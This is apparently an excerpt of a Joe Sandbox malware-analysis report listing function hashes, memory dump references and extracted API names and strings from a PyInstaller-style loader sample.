                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                • Instruction ID: 54110d507af3fadf9bcb55f8760f4296bd8306303592611890b86480046ec5a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4881A773A1C78145DB74CB15D4403697A91FB49B98F248275DA8EC3BA9EF3DE4408B10
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                • Instruction ID: dbe2d293a8233275bb1637820a959614035d4e76c7d3154e728497d6f7a66144
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0661E822E0C25246FB648A68945067D6680AF4B77CF38C6F9E61FC7AE5DF7DE8008700
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                • Instruction ID: 168ee86eabcd7c8093ddb19325eb071913fab2842a3e08796c5188a46d6f1e33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB516076A18651C6E7249B29C44022877A1EB5CF6CF348171CA4ED77A4EF3AE943C780
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                • Instruction ID: 2728c4f74a18425c2132c36ca887ae27acaa97f91e81b4657096607b21bf915d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1514476A1465196E7248B29C05432837A1EB4DF5DF348171CA8EE77B8EF3AE863C740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                • Instruction ID: 761ea832d267b33e6fa8f48cb33bf71ed334dcdb83bad8c1a118b5a986938939
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD516136A1865196E7258B29C04426833A0EB4DF6CF34C171CE4EE77A4EF3AE863C740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                • Instruction ID: 74491bbe98527b7a18ec59af64980e10c088de5e96693ea5c8bc2beac0ec12fa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8516376A1865195E7248B29D04422827A1EB4DF5CF38D171CE4EE77A8EF3AE863C740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                • Instruction ID: 19ab7dc97fbf25ef05f4ed3ba1bf90453e3b36c77036b1e44eb0ab0502a27c6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E515A36A1865586E7248B29C04423827A5EB4DF5CF348171CA4EE77B9EF3AEC57C780
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                • Instruction ID: ef3c5116bfdd9d9257fd016a63cfa216c08db60a9272f4f144ee80890183fde1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53514376A1865195E7248B29C05426827A1EB4DF5CF38C1B1CF4EE77A4EF3AE863C740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                • Instruction ID: 2b4c378de300ba8b93ad6c9aaadd8c0e45c72c8feb084abd1d68690a3f53a551
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7041A762C0D79A45EDA9891C05086B46782AF3AFA8D78D2F4DD9FD73F3ED0D6586C100
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                • Instruction ID: afce1609777d88b7621e7a6202eb946b674e4c0f3215c7354a9336b225fa12cb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F41E523B14A5582EF04CF6AD9141696391FB4CFD8B59D036DE4ED7B68EE3DD1428300
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                • Instruction ID: 20511b32406b13250a63a7f3ec8b310573e3f55f72759eaa7d96e5882097f35a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD31B432718B4285E7649F26644012D6AD5AF89FE4F248278FA8ED3BE5EF3CD4018704
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                • Instruction ID: 440fa77acf0e1655209c632178e6331a252e17b0959b50a96f93a32411d63f4c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FF04471B182958ADB989F6DB40262977D0F7083C4F50C079D599C3A14DE3C91518F04
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                • Instruction ID: 7c69f583e03cc9b604e6a24515fb8ccafe90c3ed5ec5c33843aa01038acd571b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6A0016190C80AD0E6448B10E8944262220FB59308BA080B1E00ED10B49F3CA915D200
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                • Instruction ID: 817e8710c32260bf795ffa8152808b76cadef0f59c44ad61e0768c68c560f813
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E02C324A0DB0791FE159B65B8505BA23B1AF0D75DBB490F5D82FC22B0EF7CBD598200
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B129390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF60B1245F4,00000000,00007FF60B121985), ref: 00007FF60B1293C9
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF60B1286B7,?,?,00000000,00007FF60B123CBB), ref: 00007FF60B12822C
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122810: MessageBoxW.USER32 ref: 00007FF60B1228EA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                • Instruction ID: f680ef5b67b5b6eb0e9e40332023533874ba3d2e0bffd45c45a8e7f741522574
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F518211B2DA4281FA509B25E8516BE62A0EF9E78CF74C471DA0FC26F5EF3CE9158740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                • Instruction ID: 741e58e3bf0003584a33ad8a627cdbc5761d3ddf2b2b63bb6107a342e392ba90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB51D7266087A186D6349F26A4181BBB7A1F798B69F104125EBDFC3694DF3CD045DB10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
